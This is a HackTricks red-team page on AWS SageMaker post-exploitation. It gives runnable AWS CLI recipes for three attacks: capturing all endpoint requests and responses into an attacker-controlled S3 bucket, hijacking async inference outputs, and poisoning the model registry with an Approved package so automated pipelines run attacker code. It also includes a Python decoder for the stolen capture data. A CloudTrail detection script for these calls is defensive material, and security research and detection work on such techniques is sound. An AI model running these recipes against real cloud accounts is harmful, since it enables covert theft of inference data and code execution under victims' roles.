AWS - SageMaker Post-Exploitation
Tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
SageMaker endpoint data siphon via UpdateEndpoint DataCaptureConfig
Abuse SageMaker endpoint management to enable full request/response capture to an attacker-controlled S3 bucket without touching the model or the container. UpdateEndpoint performs a blue/green deployment by default (the new instances are provisioned before traffic shifts), so the endpoint stays InService throughout and the attacker only needs endpoint-management permissions. Caveat: the capture files are written by the endpoint under the model's execution role, so that role must be allowed to PutObject on the destination; for a bucket in the same account this is usually satisfied by the broad S3 grants SageMaker execution roles tend to carry.
Requirements
- IAM: sagemaker:DescribeEndpoint, sagemaker:DescribeEndpointConfig, sagemaker:CreateEndpointConfig, sagemaker:UpdateEndpoint
- S3: s3:CreateBucket (or use an existing bucket in the same account)
- Optional (if using SSE-KMS): kms:Encrypt on the chosen CMK
- Target: an existing InService real-time endpoint in the same account/region
Steps
- Identify an InService endpoint and gather its current production variants

```bash
REGION=${REGION:-us-east-1}
# first InService real-time endpoint in the region
EP=$(aws sagemaker list-endpoints --region $REGION --query "Endpoints[?EndpointStatus=='InService']|[0].EndpointName" --output text)
echo "Endpoint=$EP"
CFG=$(aws sagemaker describe-endpoint --region $REGION --endpoint-name "$EP" --query EndpointConfigName --output text)
echo "EndpointConfig=$CFG"
# the ProductionVariants are reused verbatim so model and instances stay untouched
aws sagemaker describe-endpoint-config --region $REGION --endpoint-config-name "$CFG" --query ProductionVariants > /tmp/pv.json
```

- Prepare the attacker S3 destination for the captures

```bash
ACC=$(aws sts get-caller-identity --query Account --output text)
BUCKET=ht-sm-capture-$ACC-$(date +%s)
aws s3 mb s3://$BUCKET --region $REGION
```

- Create a new EndpointConfig that keeps the same variants but enables DataCapture to the attacker bucket. Note: use explicit content types that satisfy CLI validation.

```bash
NEWCFG=${CFG}-dc
cat > /tmp/dc.json << JSON
{
  "EnableCapture": true,
  "InitialSamplingPercentage": 100,
  "DestinationS3Uri": "s3://$BUCKET/capture",
  "CaptureOptions": [
    {"CaptureMode": "Input"},
    {"CaptureMode": "Output"}
  ],
  "CaptureContentTypeHeader": {
    "JsonContentTypes": ["application/json"],
    "CsvContentTypes": ["text/csv"]
  }
}
JSON
aws sagemaker create-endpoint-config \
  --region $REGION \
  --endpoint-config-name "$NEWCFG" \
  --production-variants file:///tmp/pv.json \
  --data-capture-config file:///tmp/dc.json
```

- Apply the new config. UpdateEndpoint defaults to a blue/green deployment, so the endpoint keeps serving while the new fleet comes up.

```bash
aws sagemaker update-endpoint --region $REGION --endpoint-name "$EP" --endpoint-config-name "$NEWCFG"
aws sagemaker wait endpoint-in-service --region $REGION --endpoint-name "$EP"
```

- Generate at least one inference call (optional if live traffic exists)

```bash
echo '{"inputs":[1,2,3]}' > /tmp/payload.json
aws sagemaker-runtime invoke-endpoint --region $REGION --endpoint-name "$EP" \
  --content-type application/json --accept application/json \
  --body fileb:///tmp/payload.json /tmp/out.bin || true
```

- Validate the captures in the attacker bucket. Capture files are JSON Lines written under the variant name and a year/month/day/hour prefix.

```bash
aws s3 ls s3://$BUCKET/capture/ --recursive --human-readable --summarize
```
Impact
- Full exfiltration of real‑time inference request and response payloads (and metadata) from the targeted endpoint to an attacker‑controlled S3 bucket.
- No changes to the model/container image and only endpoint‑level changes, enabling a stealthy data theft path with minimal operational disruption.
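Once captures land, what the attacker actually gets are JSON Lines records under s3://$BUCKET/capture/<variant>/<yyyy>/<mm>/<dd>/<hh>/. The following is an added example, not code from the original page: it decodes such records into request/response pairs, handling the JSON, CSV and BASE64 encodings the capture format uses and skipping malformed lines without aborting the file. The field names follow SageMaker's documented capture record layout (captureData.endpointInput/endpointOutput with data and encoding, eventMetadata.eventId); the sample lines are constructed here, not real captures.

```python
"""Decode SageMaker data-capture JSON Lines into request/response pairs.

Added example (not from the original page); sample records are constructed.
"""
import base64
import json


def decode_capture_part(part):
    """Return the raw payload bytes of one endpointInput/endpointOutput entry.

    'encoding' is JSON or CSV when the payload was stored as text and
    BASE64 when the content type was treated as binary.
    """
    if part is None:
        return None
    data = part.get("data", "")
    enc = (part.get("encoding") or "").upper()
    if enc == "BASE64":
        return base64.b64decode(data)
    # JSON / CSV payloads are stored verbatim as text
    return data.encode("utf-8")


def parse_capture_lines(lines):
    """Parse capture JSONL lines; blank lines are skipped, bad lines reported."""
    records = []
    for n, line in enumerate(lines, 1):
        line = line.strip()
        if not line:
            continue
        try:
            rec = json.loads(line)
            cap = rec["captureData"]
            meta = rec.get("eventMetadata", {})
            records.append({
                "event_id": meta.get("eventId"),
                "time": meta.get("inferenceTime"),
                "input_type": cap.get("endpointInput", {}).get("observedContentType"),
                "input": decode_capture_part(cap.get("endpointInput")),
                "output": decode_capture_part(cap.get("endpointOutput")),
            })
        except (ValueError, KeyError) as exc:
            records.append({"line": n, "error": str(exc)})
    return records


def _sample_line(inp, inp_enc, inp_ct, out, out_enc, out_ct, eid):
    """Build one constructed capture record (Output omitted when out is None)."""
    cap = {"endpointInput": {"observedContentType": inp_ct, "mode": "INPUT",
                             "data": inp, "encoding": inp_enc}}
    if out is not None:
        cap["endpointOutput"] = {"observedContentType": out_ct, "mode": "OUTPUT",
                                 "data": out, "encoding": out_enc}
    return json.dumps({"captureData": cap,
                       "eventMetadata": {"eventId": eid, "inferenceTime": "2024-05-01T10:00:00Z"},
                       "eventVersion": "0"})


# Constructed sample: a JSON request whose response was captured as BASE64,
# a blank line, a CSV request with Input-only capture, and a corrupt line.
SAMPLE_CAPTURE_LINES = [
    _sample_line('{"inputs":[1,2,3]}', "JSON", "application/json",
                 base64.b64encode(b'{"prediction": 0.9}').decode(), "BASE64",
                 "application/json", "a1b2c3"),
    "",
    _sample_line("1,2,3\n", "CSV", "text/csv", None, None, None, "d4e5f6"),
    "{not json",
]

if __name__ == "__main__":
    for r in parse_capture_lines(SAMPLE_CAPTURE_LINES):
        print(r)
```

Run it against a downloaded capture file by replacing SAMPLE_CAPTURE_LINES with the file's lines; each decoded record pairs the request body with the model's response, which is exactly what the siphon exfiltrates.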
SageMaker async inference output hijack via UpdateEndpoint AsyncInferenceConfig
Abuse endpoint management to redirect asynchronous inference outputs to an attacker-controlled S3 bucket by cloning the current EndpointConfig and setting AsyncInferenceConfig.OutputConfig S3OutputPath/S3FailurePath. This exfiltrates model predictions (and any transformed inputs the container includes in its output) without modifying the model or container. Caveat: InvokeEndpointAsync returns OutputLocation/FailureLocation to the caller, so after the switch legitimate consumers are pointed at the attacker bucket and their fetches fail with AccessDenied unless the bucket policy lets them read; this is noisier than passive data capture.
Requirements
- IAM: sagemaker:DescribeEndpoint, sagemaker:DescribeEndpointConfig, sagemaker:CreateEndpointConfig, sagemaker:UpdateEndpoint
- S3: ability to write to the attacker S3 bucket (via the model execution role or a permissive bucket policy)
- Target: an InService endpoint where asynchronous invocations are (or will be) used
Steps
- Gather the current ProductionVariants from the target endpoint

```bash
REGION=${REGION:-us-east-1}
EP=<target-endpoint-name>
CUR_CFG=$(aws sagemaker describe-endpoint --region $REGION --endpoint-name "$EP" --query EndpointConfigName --output text)
aws sagemaker describe-endpoint-config --region $REGION --endpoint-config-name "$CUR_CFG" --query ProductionVariants > /tmp/pv.json
```

- Create an attacker bucket (ensure the model execution role can PutObject to it, since the endpoint writes the results)

```bash
ACC=$(aws sts get-caller-identity --query Account --output text)
BUCKET=ht-sm-async-exfil-$ACC-$(date +%s)
aws s3 mb s3://$BUCKET --region $REGION || true
```

- Clone the EndpointConfig and point the AsyncInference outputs at the attacker bucket

```bash
NEWCFG=${CUR_CFG}-async-exfil
cat > /tmp/async_cfg.json << JSON
{"OutputConfig": {"S3OutputPath": "s3://$BUCKET/async-out/", "S3FailurePath": "s3://$BUCKET/async-fail/"}}
JSON
aws sagemaker create-endpoint-config --region $REGION --endpoint-config-name "$NEWCFG" --production-variants file:///tmp/pv.json --async-inference-config file:///tmp/async_cfg.json
aws sagemaker update-endpoint --region $REGION --endpoint-name "$EP" --endpoint-config-name "$NEWCFG"
aws sagemaker wait endpoint-in-service --region $REGION --endpoint-name "$EP"
```

- Trigger an async invocation and verify that objects land in the attacker bucket (the response of invoke-endpoint-async already shows the new OutputLocation)

```bash
aws s3 cp /etc/hosts s3://$BUCKET/inp.bin
aws sagemaker-runtime invoke-endpoint-async --region $REGION --endpoint-name "$EP" --input-location s3://$BUCKET/inp.bin >/tmp/async.json || true
sleep 30
aws s3 ls s3://$BUCKET/async-out/ --recursive || true
aws s3 ls s3://$BUCKET/async-fail/ --recursive || true
```
Impact
- Redirects asynchronous inference results (and error bodies) to attacker-controlled S3, enabling covert exfiltration of predictions and potentially sensitive pre/post-processed inputs produced by the container, without changing model code or image and with minimal/no downtime.
SageMaker Model Registry supply-chain injection via CreateModelPackage(Approved)
If an attacker can CreateModelPackage on a target SageMaker Model Package Group, they can register a new model version that points to an attacker-controlled container image and immediately mark it Approved. Many CI/CD pipelines auto-deploy Approved model versions to endpoints or training jobs, resulting in attacker code execution under the service’s execution roles. Cross-account exposure can be amplified by a permissive ModelPackageGroup resource policy.
Requirements
- IAM (minimum to poison an existing group): sagemaker:CreateModelPackage on the target ModelPackageGroup
- Optional (to create a group if one doesn't exist): sagemaker:CreateModelPackageGroup
- S3: read access to the referenced ModelDataUrl (or host attacker-controlled artifacts)
- Target: a Model Package Group that downstream automation watches for Approved versions
Steps
- Set the region and create (or find) a target Model Package Group

```bash
REGION=${REGION:-us-east-1}
MPG=victim-group-$(date +%s)   # or the name of an existing group that CI/CD watches
aws sagemaker create-model-package-group --region $REGION --model-package-group-name $MPG --model-package-group-description "test group"
```

- Prepare dummy model data in S3

```bash
ACC=$(aws sts get-caller-identity --query Account --output text)
BUCKET=ht-sm-mpkg-$ACC-$(date +%s)
aws s3 mb s3://$BUCKET --region $REGION
head -c 1024 </dev/urandom > /tmp/model.tar.gz
aws s3 cp /tmp/model.tar.gz s3://$BUCKET/model/model.tar.gz --region $REGION
```

- Register a malicious (here benign) Approved model package version referencing a public AWS DLC image. In a real attack the image would be attacker-controlled. Note that the registry account ID below is the us-east-1 scikit-learn DLC account; DLC account IDs differ per region.

```bash
IMG="683313688378.dkr.ecr.$REGION.amazonaws.com/sagemaker-scikit-learn:1.2-1-cpu-py3"
cat > /tmp/inf.json << JSON
{
  "Containers": [
    {
      "Image": "$IMG",
      "ModelDataUrl": "s3://$BUCKET/model/model.tar.gz"
    }
  ],
  "SupportedContentTypes": ["text/csv"],
  "SupportedResponseMIMETypes": ["text/csv"]
}
JSON
# --model-package-group-name makes this a versioned package; Approved is the status auto-deploy pipelines key on
aws sagemaker create-model-package --region $REGION --model-package-group-name $MPG --model-approval-status Approved --inference-specification file:///tmp/inf.json
```

- Verify the new Approved version exists

```bash
aws sagemaker list-model-packages --region $REGION --model-package-group-name $MPG --output table
```
Impact
- Poison the Model Registry with an Approved version that references attacker-controlled code. Pipelines that auto-deploy Approved models may pull and run the attacker image, yielding code execution under endpoint/training roles.
- With a permissive ModelPackageGroup resource policy (PutModelPackageGroupPolicy), this abuse can be triggered cross-account.
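From the defender's side, all three techniques on this page (data-capture siphon, async output hijack, Approved model-package injection) are control-plane calls that CloudTrail records together with their request parameters. The following is an added example, not code from the original page: it scans a batch of CloudTrail records and flags CreateEndpointConfig calls whose DataCaptureConfig or AsyncInferenceConfig point outside a bucket allowlist, the UpdateEndpoint that activates such a config, and CreateModelPackage calls that register an Approved version whose image or ModelDataUrl comes from an untrusted ECR account or bucket. The allowlists, account IDs and events are constructed; request-parameter keys are matched case-insensitively so the lowerCamelCase CloudTrail uses in requestParameters does not matter.

```python
"""Flag SageMaker exfil/poisoning changes in CloudTrail records.

Added example (not from the original page); allowlists and events are constructed.
"""
import re
from urllib.parse import urlparse

# Hypothetical allowlists for the monitored account; tune to the environment.
TRUSTED_BUCKETS = {"prod-ml-artifacts", "prod-ml-captures"}
TRUSTED_ECR_ACCOUNTS = {"683313688378", "111122223333"}  # sklearn DLC registry (us-east-1) + own account
ECR_IMAGE_RE = re.compile(r"^(\d{12})\.dkr\.ecr\.[a-z0-9-]+\.amazonaws\.com/")


def _lower_keys(obj):
    """Lower-case dict keys recursively so lowerCamelCase vs PascalCase does not matter."""
    if isinstance(obj, dict):
        return {k.lower(): _lower_keys(v) for k, v in obj.items()}
    if isinstance(obj, list):
        return [_lower_keys(v) for v in obj]
    return obj


def bucket_of(s3_uri):
    """Bucket name of an s3:// URI, or None if it is not one."""
    p = urlparse(s3_uri or "")
    return p.netloc if p.scheme == "s3" else None


def endpoint_config_findings(params):
    """Reasons a CreateEndpointConfig call sends captured/async data to an untrusted bucket."""
    reasons = []
    dc = params.get("datacaptureconfig") or {}
    if dc.get("enablecapture"):
        b = bucket_of(dc.get("destinations3uri"))
        if b not in TRUSTED_BUCKETS:
            reasons.append(f"DataCapture destination in untrusted bucket {b}")
    out = (params.get("asyncinferenceconfig") or {}).get("outputconfig") or {}
    for key in ("s3outputpath", "s3failurepath"):
        if key in out and bucket_of(out[key]) not in TRUSTED_BUCKETS:
            reasons.append(f"Async {key} in untrusted bucket {bucket_of(out[key])}")
    return reasons


def model_package_findings(params):
    """Reasons an Approved CreateModelPackage call looks like registry poisoning."""
    reasons = []
    if (params.get("modelapprovalstatus") or "").lower() != "approved":
        return reasons  # only Approved versions are auto-deployed by the pipelines at issue
    spec = params.get("inferencespecification") or {}
    for c in spec.get("containers") or []:
        m = ECR_IMAGE_RE.match(c.get("image") or "")
        if not m or m.group(1) not in TRUSTED_ECR_ACCOUNTS:
            reasons.append(f"Approved package uses image from untrusted registry: {c.get('image')}")
        b = bucket_of(c.get("modeldataurl"))
        if b and b not in TRUSTED_BUCKETS:
            reasons.append(f"Approved package ModelDataUrl in untrusted bucket {b}")
    return reasons


def scan(records):
    """Return (eventName, principalArn, reason) alerts; UpdateEndpoint is alerted
    only when it activates a config flagged earlier in the same batch."""
    flagged_cfgs, alerts = set(), []
    for rec in records:
        if rec.get("eventSource") != "sagemaker.amazonaws.com":
            continue
        name = rec.get("eventName")
        params = _lower_keys(rec.get("requestParameters") or {})
        who = (rec.get("userIdentity") or {}).get("arn", "?")
        if name == "CreateEndpointConfig":
            reasons = endpoint_config_findings(params)
            if reasons:
                flagged_cfgs.add(params.get("endpointconfigname"))
            alerts += [(name, who, r) for r in reasons]
        elif name == "UpdateEndpoint" and params.get("endpointconfigname") in flagged_cfgs:
            alerts.append((name, who, f"endpoint {params.get('endpointname')} switched to flagged config {params.get('endpointconfigname')}"))
        elif name == "CreateModelPackage":
            alerts += [(name, who, r) for r in model_package_findings(params)]
    return alerts


def _ev(name, params, who="arn:aws:iam::111122223333:user/ml-ci"):
    return {"eventSource": "sagemaker.amazonaws.com", "eventName": name,
            "userIdentity": {"arn": who}, "requestParameters": params}


# Constructed events mirroring the CLI calls on this page (not real CloudTrail output).
SAMPLE_EVENTS = [
    _ev("CreateEndpointConfig", {"endpointConfigName": "fraud-cfg-v7", "dataCaptureConfig": {
        "enableCapture": True, "destinationS3Uri": "s3://prod-ml-captures/fraud"}}),
    _ev("CreateEndpointConfig", {"endpointConfigName": "fraud-cfg-v7-dc", "dataCaptureConfig": {
        "enableCapture": True, "initialSamplingPercentage": 100,
        "destinationS3Uri": "s3://ht-sm-capture-111122223333-1700000000/capture"}}),
    _ev("UpdateEndpoint", {"endpointName": "fraud-ep", "endpointConfigName": "fraud-cfg-v7-dc"}),
    _ev("CreateEndpointConfig", {"endpointConfigName": "fraud-cfg-v7-async-exfil",
        "asyncInferenceConfig": {"outputConfig": {
            "s3OutputPath": "s3://ht-sm-async-exfil-111122223333-1700000000/async-out/",
            "s3FailurePath": "s3://ht-sm-async-exfil-111122223333-1700000000/async-fail/"}}}),
    _ev("CreateModelPackage", {"modelPackageGroupName": "fraud-models", "modelApprovalStatus": "Approved",
        "inferenceSpecification": {"containers": [{
            "image": "999999999999.dkr.ecr.us-east-1.amazonaws.com/sagemaker-scikit-learn:1.2-1-cpu-py3",
            "modelDataUrl": "s3://ht-sm-mpkg-111122223333-1700000000/model/model.tar.gz"}]}}),
    _ev("CreateModelPackage", {"modelPackageGroupName": "fraud-models", "modelApprovalStatus": "PendingManualApproval",
        "inferenceSpecification": {"containers": [{"image": "999999999999.dkr.ecr.us-east-1.amazonaws.com/x:1"}]}}),
]
```

Calling scan(SAMPLE_EVENTS) yields six alerts: the data-capture config and the UpdateEndpoint that activated it, both async output paths, and the image and ModelDataUrl of the Approved package; the legitimate capture config and the unapproved package produce none. In production, feed it the records from a CloudTrail lake query or an EventBridge rule on sagemaker.amazonaws.com, and keep TRUSTED_BUCKETS in sync with the buckets the execution roles are actually meant to write to.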
Feature store poisoning
Abuse sagemaker:PutRecord on a Feature Group with OnlineStore enabled to overwrite live feature values consumed by online inference. Combined with sagemaker:GetRecord, an attacker can read sensitive features. This does not require access to models or endpoints.
{{#ref}} feature-store-poisoning.md {{/ref}}